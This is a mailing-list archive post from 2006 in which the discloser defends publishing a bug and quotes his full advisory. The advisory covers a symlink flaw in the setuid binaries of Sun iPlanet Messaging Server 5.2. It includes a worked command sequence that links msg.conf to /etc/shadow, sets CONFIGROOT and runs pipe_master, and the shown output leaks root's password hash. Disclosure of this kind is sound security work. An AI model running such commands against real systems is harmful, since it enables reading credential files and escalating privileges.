Full Disclosure mailing list archives
RE: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise]
From: "php0t" <very () unprivate com>
Date: Sat, 17 Jun 2006 22:24:25 +0200
Excuse me, but what have I done to you? And why am I only supposed to disclose bugs when somebody pays me for it ? Can you please explain your rant, so next time I can do -whatever- different? And by the way, I'm not 'trying to prove I can find holes', I didn't spend any time trying to find a hole in this specific software, I just happened to stumble upon it in the process of trying to gain root - after which I decided to disclose this silly and obvious bug. So I ask again, is this a problem for you? Am I being ignorant / evil for posting this vuln? Just tell me what's up - If your problem is that I do not get paid for this - well - I am happy that you are so much after what's best for me but I can do fine on my own - thanks. php0t / zorro.hu
You are wasting your time trying to prove you can find holes in
software that you AREN'T *PAID FOR* FINDING BUGS.
Nice advisory, though. you spend time on it.
Sincerely, T.Solo
php0t wrote:
Summary ---------------- Date: 14 Jun 2006 Vendor: Sun Microsystems, Inc. Name: iPlanet Messaging Server Version: 5.2 HotFix 1.16 (built May 14 2003) Vuln: msg.conf symlink attack Severity: high Software description ---------------- The iPlanet Messaging Server is a software product that provides a centralized location for the exchange of information through the sending and receiving of messages. The product is designed for telecommunications providers, service providers, and enterprises that offer messaging capabilities to employees, partners, and customers. The iPlanet Messaging Server delivers a Web-based messaging platform capable of serving tens of millions of users, and also provides value-added differentiated services, including outsourcing, wireless ,and unified messaging services. Vulnerability desciption ---------------- Setuid programs part of the iPlanet Messaging Server try to read the configuration file msg.conf. If the environment variable CONFIGROOT is
set, the configuration is read from that directory. A symlink attack is possible, and as a result it is possible to read
the
first line of any file with uid=0. Example ---------------- test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris test@sunbox:/tmp$ test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master -rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master test@sunbox:/tmp$ test@sunbox:/tmp$ ln -s /etc/shadow msg.conf test@sunbox:/tmp$ test@sunbox:/tmp$ export CONFIGROOT=. test@sunbox:/tmp$ test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed
by
'='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database initialization failed - see default logfile test@sunbox:/tmp$ Vulnerable ---------------- iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) php0t / zorro.hu www.zorro.hu _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise] php0t (Jun 17)